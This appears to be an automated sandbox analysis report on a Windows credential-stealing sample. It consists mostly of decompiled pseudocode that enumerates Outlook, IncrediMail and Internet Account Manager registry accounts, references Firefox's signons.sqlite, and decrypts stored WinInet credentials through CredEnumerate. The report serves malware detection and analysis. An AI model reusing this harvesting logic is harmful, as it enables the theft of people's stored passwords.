                                                                                              • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                              • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                              • String ID: none$signons.sqlite$signons.txt
                                                                                              • API String ID: 2681923396-1088577317
                                                                                              • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                              • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                              • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                              • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                                                              0x00402c44
                                                                                              0x00402c44
                                                                                              0x00402c5c
                                                                                              0x00402c61
                                                                                              0x00402c68
                                                                                              0x00402c7b
                                                                                              0x00402c7e
                                                                                              0x00402c84
                                                                                              0x00402c94
                                                                                              0x00402c99
                                                                                              0x00402c9e
                                                                                              0x00402ca6
                                                                                              0x00402cab
                                                                                              0x00402cab
                                                                                              0x00402cc6
                                                                                              0x00402cd8
                                                                                              0x00402cde
                                                                                              0x00402cf7
                                                                                              0x00402d0a
                                                                                              0x00402d0f
                                                                                              0x00402d12
                                                                                              0x00402d14
                                                                                              0x00402d1c
                                                                                              0x00402d1c
                                                                                              0x00402d35
                                                                                              0x00402d48
                                                                                              0x00402d4d
                                                                                              0x00402d50
                                                                                              0x00402d52
                                                                                              0x00402d5c
                                                                                              0x00402d5c
                                                                                              0x00402d61
                                                                                              0x00402d71
                                                                                              0x00402d76
                                                                                              0x00402d79
                                                                                              0x00402d82
                                                                                              0x00402d86
                                                                                              0x00402d86
                                                                                              0x00402d8c
                                                                                              0x00402d8f
                                                                                              0x00402d97

                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 00402C84
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • memset.MSVCRT ref: 00402CDE
                                                                                              • sprintf.MSVCRT ref: 00402CF7
                                                                                              • sprintf.MSVCRT ref: 00402D35
                                                                                                • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                                • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Closememset$sprintf$EnumOpen
                                                                                              • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                              • API String ID: 1831126014-3814494228
                                                                                              • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                              • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                              • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                              • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}


















                                                                                              0x0040b53c
                                                                                              0x0040b545
                                                                                              0x0040b54d
                                                                                              0x0040b54f
                                                                                              0x0040b551
                                                                                              0x0040b689
                                                                                              0x0040b689
                                                                                              0x0040b68e
                                                                                              0x0040b6b1
                                                                                              0x0040b6b6
                                                                                              0x0040b6b6
                                                                                              0x0040b6b8
                                                                                              0x0040b6bd
                                                                                              0x0040b6c3
                                                                                              0x0040b6c5
                                                                                              0x0040b6c8
                                                                                              0x0040b6ce
                                                                                              0x0040b6d4
                                                                                              0x0040b6dd
                                                                                              0x0040b6e0
                                                                                              0x0040b6e8
                                                                                              0x0040b6e8
                                                                                              0x0040b6ef
                                                                                              0x0040b6ef
                                                                                              0x0040b6d6
                                                                                              0x0040b6d6
                                                                                              0x0040b6d6
                                                                                              0x0040b6d4
                                                                                              0x00000000
                                                                                              0x0040b6fe
                                                                                              0x0040b690
                                                                                              0x0040b690
                                                                                              0x0040b691
                                                                                              0x0040b6a8
                                                                                              0x00000000
                                                                                              0x0040b6a8
                                                                                              0x0040b693
                                                                                              0x0040b696
                                                                                              0x0040b69e
                                                                                              0x0040b69e
                                                                                              0x00000000
                                                                                              0x0040b696
                                                                                              0x0040b557
                                                                                              0x0040b679
                                                                                              0x0040b680
                                                                                              0x00000000
                                                                                              0x0040b680
                                                                                              0x0040b560
                                                                                              0x0040b651
                                                                                              0x0040b654
                                                                                              0x0040b671
                                                                                              0x0040b656
                                                                                              0x0040b663
                                                                                              0x0040b663
                                                                                              0x00000000
                                                                                              0x0040b654
                                                                                              0x0040b569
                                                                                              0x0040b626
                                                                                              0x0040b62c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b641
                                                                                              0x00000000
                                                                                              0x0040b649
                                                                                              0x0040b572
                                                                                              0x0040b59e
                                                                                              0x0040b5a4
                                                                                              0x0040b5aa
                                                                                              0x0040b5b5
                                                                                              0x0040b5c3
                                                                                              0x0040b5da
                                                                                              0x0040b5e2
                                                                                              0x0040b5e3
                                                                                              0x0040b5e4
                                                                                              0x0040b5e5
                                                                                              0x0040b5e6
                                                                                              0x0040b5ff
                                                                                              0x0040b606
                                                                                              0x0040b60d
                                                                                              0x0040b619
                                                                                              0x0040b61b
                                                                                              0x0040b61b
                                                                                              0x0040b574
                                                                                              0x0040b577
                                                                                              0x0040b583
                                                                                              0x0040b58c
                                                                                              0x0040b594
                                                                                              0x0040b594
                                                                                              0x0040b58c
                                                                                              0x0040b577
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                              • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                              • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                                • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                                                • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                                                • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                              • LoadCursorA.USER32 ref: 0040B63A
                                                                                              • SetCursor.USER32(00000000), ref: 0040B641
                                                                                              • PostMessageA.USER32 ref: 0040B663
                                                                                              • SetFocus.USER32(?), ref: 0040B69E
                                                                                              • SetFocus.USER32(?), ref: 0040B6EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                              • String ID:
                                                                                              • API String ID: 1416211542-0
                                                                                              • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                              • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                              • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                              • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405FC6, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ECB(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                              0x00405fcc
                                                                                              0x00405fd0
                                                                                              0x00405fd9
                                                                                              0x00405fe2
                                                                                              0x00405fe5
                                                                                              0x0040605b
                                                                                              0x00405fe7
                                                                                              0x00405ff3
                                                                                              0x00405ff5
                                                                                              0x00406004
                                                                                              0x00406008
                                                                                              0x0040603e
                                                                                              0x00406044
                                                                                              0x0040600a
                                                                                              0x00406013
                                                                                              0x00406026
                                                                                              0x00000000
                                                                                              0x00406028
                                                                                              0x00406029
                                                                                              0x0040602d
                                                                                              0x00406036
                                                                                              0x00406036
                                                                                              0x00406026
                                                                                              0x0040604a
                                                                                              0x00406052
                                                                                              0x0040605e
                                                                                              0x00406068

                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 00405FD0
                                                                                                • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                                                              • GlobalLock.KERNEL32 ref: 0040600B
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                                                              • SetClipboardData.USER32 ref: 00406036
                                                                                              • GetLastError.KERNEL32 ref: 0040603E
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040604A
                                                                                              • GetLastError.KERNEL32 ref: 00406055
                                                                                              • CloseClipboard.USER32 ref: 0040605E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3604893535-0
                                                                                              • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                              • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                                                              • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                              • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy
                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                              • API String ID: 3177657795-318151290
                                                                                              • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                              • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                                              • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                              • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040765B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E0040765B(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404647( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x417968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x417968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046D7( &_v532);
									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4125f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047F1( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046C2( &_v1108);
			}















































                                                                                              0x00407661
                                                                                              0x0040766b
                                                                                              0x00407670
                                                                                              0x00407674
                                                                                              0x0040767f
                                                                                              0x00407689
                                                                                              0x0040768d
                                                                                              0x00407691
                                                                                              0x004076a8
                                                                                              0x004076a8
                                                                                              0x00407693
                                                                                              0x0040769f
                                                                                              0x0040769f
                                                                                              0x004076ac
                                                                                              0x004076b4
                                                                                              0x004076c3
                                                                                              0x004076c3
                                                                                              0x004076cf
                                                                                              0x004076d3
                                                                                              0x004076db
                                                                                              0x004076df
                                                                                              0x004076e5
                                                                                              0x004076f7
                                                                                              0x00407709
                                                                                              0x0040770e
                                                                                              0x00407713
                                                                                              0x00407719
                                                                                              0x00407719
                                                                                              0x00407724
                                                                                              0x0040772c
                                                                                              0x0040772d
                                                                                              0x0040772d
                                                                                              0x00407735
                                                                                              0x0040773c
                                                                                              0x00407743
                                                                                              0x0040774b
                                                                                              0x00407753
                                                                                              0x00407757
                                                                                              0x00407763
                                                                                              0x00407795
                                                                                              0x0040779d
                                                                                              0x004077a2
                                                                                              0x004077ab
                                                                                              0x004077b0
                                                                                              0x004077b2
                                                                                              0x004077b2
                                                                                              0x004077c1
                                                                                              0x004077c9
                                                                                              0x004077d0
                                                                                              0x004077d7
                                                                                              0x004077de
                                                                                              0x004077e5
                                                                                              0x004077ec
                                                                                              0x004077f3
                                                                                              0x004077f7
                                                                                              0x00407801
                                                                                              0x00407809
                                                                                              0x0040780d
                                                                                              0x00407815
                                                                                              0x0040781a
                                                                                              0x0040781f
                                                                                              0x00407821
                                                                                              0x00407827
                                                                                              0x00407827
                                                                                              0x0040783b
                                                                                              0x0040783f
                                                                                              0x0040783f
                                                                                              0x0040784c
                                                                                              0x0040784c
                                                                                              0x00407851
                                                                                              0x0040785d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040785d
                                                                                              0x004076e5
                                                                                              0x00407863
                                                                                              0x00407867
                                                                                              0x00407867
                                                                                              0x004076ac
                                                                                              0x0040787a

                                                                                              APIs
                                                                                                • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                              • wcslen.MSVCRT ref: 004076C5
                                                                                              • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                                              • memset.MSVCRT ref: 0040779D
                                                                                              • memcpy.MSVCRT ref: 004077C1
                                                                                              • wcschr.MSVCRT ref: 00407815
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                                                • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                              • String ID: J$Microsoft_WinInet$hyA
                                                                                              • API String ID: 2413121283-319027496
                                                                                              • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                              • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                                              • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                              • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402FC2, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040EC05(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040EC05(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040EC05(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040EC05(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

























                                                                                              0x00402fc2
                                                                                              0x00402fc2
                                                                                              0x00402fcd
                                                                                              0x00402fdb
                                                                                              0x00402fe0
                                                                                              0x00402fe7
                                                                                              0x00402ffc
                                                                                              0x00402fff
                                                                                              0x00403005
                                                                                              0x00403015
